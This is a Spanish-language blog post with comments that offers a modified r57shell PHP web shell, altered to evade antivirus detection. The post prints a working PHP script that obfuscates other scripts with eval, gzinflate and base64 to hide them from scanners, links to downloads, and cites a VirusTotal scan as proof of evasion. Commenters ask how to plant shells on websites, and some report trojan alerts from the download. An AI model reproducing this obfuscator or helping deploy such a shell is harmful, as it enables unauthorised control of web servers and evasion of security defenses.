r57shell Modificada
Agosto 13, 2008
Actualizado: Links corregidos
Nota: Por favor leer el Disclaimer del sitio
Para aquellos que necesiten una shell y que sea indetectable por los antivirus, acá dejo un link de la r57shell modificada.
Los cambios fueron:
* Lenguaje de inglés a español
* Tres códigos maliciosos que enviaban un mail al creador de la shell con la ruta del script en la aplicación web
¿Cómo se hace indetectable la shell?
Por medio de tres funciones que hacen que un script PHP funcione normalmente, y es una técnica bastante común.
La primera función es eval(), que permite ejecutar código PHP.
La segunda función es base64_decode(), que permite decodificar una cadena que previamente fue codificada con dicho método.
Y la última función, gzinflate(), que sirve para descomprimir una cadena previamente comprimida por la función gzdeflate().
El script que ofusca el código de otros scripts de PHP es el siguiente
// @autor: www.sinfocol.org
$r_arch=$_GET['archivo']; //Recibimos el nombre del archivo por medio de la variable 'archivo'. ex: localhost/script.php?archivo=script_a_ofuscar.php
if(file_exists($r_arch)){
$larch=fopen($r_arch,'r'); //Abre el archivo en modo de lectura en caso de que exista
$x=base64_encode(gzdeflate(fread($larch,filesize($r_arch)),9)); //Primero lee el archivo, lo comprime con el máximo nivel y luego lo codifica con base64
fclose($larch);
if($narch=fopen($r_arch.'_ofuscado.php','w')){
fwrite($narch,"<?php\r\n//\$usuario='';\r\n//\$contraseña='';\r\neval(gzinflate(base64_decode('".$x."')));?>"); //Escribe el archivo ofuscado
fclose($narch);
echo 'Archivo generado con éxito en '.$r_arch.'_ofuscado.php';
}else{
echo 'Error.';
}
}else{
echo 'El archivo '.htmlentities($r_arch).' no existe.';
}
El tamaño del archivo se ve notablemente disminuido, el archivo original de la shell pesa 87,735 bytes, mientras que el archivo generado por el ofuscador pesa 29,955 bytes.
Para agregar un usuario y contraseña a la shell, para que nadie pueda ingresar a ella, deberán modificar el script ofuscado, y por medio de la variable 'gen' de la nueva shell generar los hashes correspondientes al usuario y contraseña, de esta forma:
Hash generado: a5a6c174381715f9e9c47033f63b051294c60dba
Para que el código del ofuscador funcione correctamente, al script original deben quitarle las etiquetas PHP, <php y ?>, ya que la función eval solo evalua el contenido del script mas no las etiquetas.
Descarga r57shell original
Descarga r57shell modificada
Si alguién tiene dudas de la efectividad de la shell, acá está la prueba de que ningún antivirus la detecta: http://www.virustotal.com/analisis/6a0480eaa6a132af0d93162d1d9c2cb9
La contraseña para ambos archivos comprimidos es
Archivado en: Programación |
EL link de la Shell PHP modificada, ya no es valido, podrias enviarme el archivo, via email? o publicar un link nuevo, y poder recibir una notificacion, de que fue modificado el link.
Agradesco de antemano, por este aporte, es de gran utilidad.
Saludos Cordiales.
mexwOrm
Hacer caso omiso del siguiente comentario
señores... al descomprimir Descarga r57shell modificada me salta un troyano... ese fichero está infectado
Es verdad lo que dice TUTOEGO, al descomprimir salta el KIS y dice que es un troyano, no lo descarguen porque este tio lo que quiere es robar sus contraseñas, bye
Dios mío, la gente ahora no sabe leer o que es lo que pasa?
Para aquellos que necesiten una shell y que sea indetectable por los antivirus, acá dejo un link de la r57shell modificada.
La shell detectada es la original, oséa la que está en esta dirección: http://www.sinfocol.org/archivos/2009/02/cell_original.zip
La shell modificada es imposible detectarla porque usa un eval y el contenido del base64 puede ser cualquier cosa.
Yo no soy tu tío, y con una shell es imposible robar "contraseñas" al menos que sean del mismo servidor, ignorante...
Slaudos, Solicito un poco de explicacion para configurar la contrase;a, por cierto es muy bueno el codigo lo use con c99 y funciono al 100...
Tengo la duda si la configuracion de contrase;a es solo para r57.
Agradesco de antemano su respuesta
Exitos...
Lejiro: Lamentablemente sí, el código para el manejo de usuario con contraseña es exlusivo de esta shell, pero que recuerde, la c99 también maneja su código para la autenticación de usuarios.
Buenas , alguien me da una guia de como usar una shell y levantarla en una web?
me parece que el codigo podria ser depurado quitandoles los virus para que funcione sin virus.
Alguien lo a logrado??
saludos
Realmente estaba intentado buscar una solucion a este problema, proque hasta ahora todas las shell para php, que he encontrado son detectas por el antivirus Nod32 como codigo malicioso, troyanos y etc.
Tu solucion tampoco ayudo mucho, existe alguna otra variante, para evitar que el codigo php sea detectado como un virus?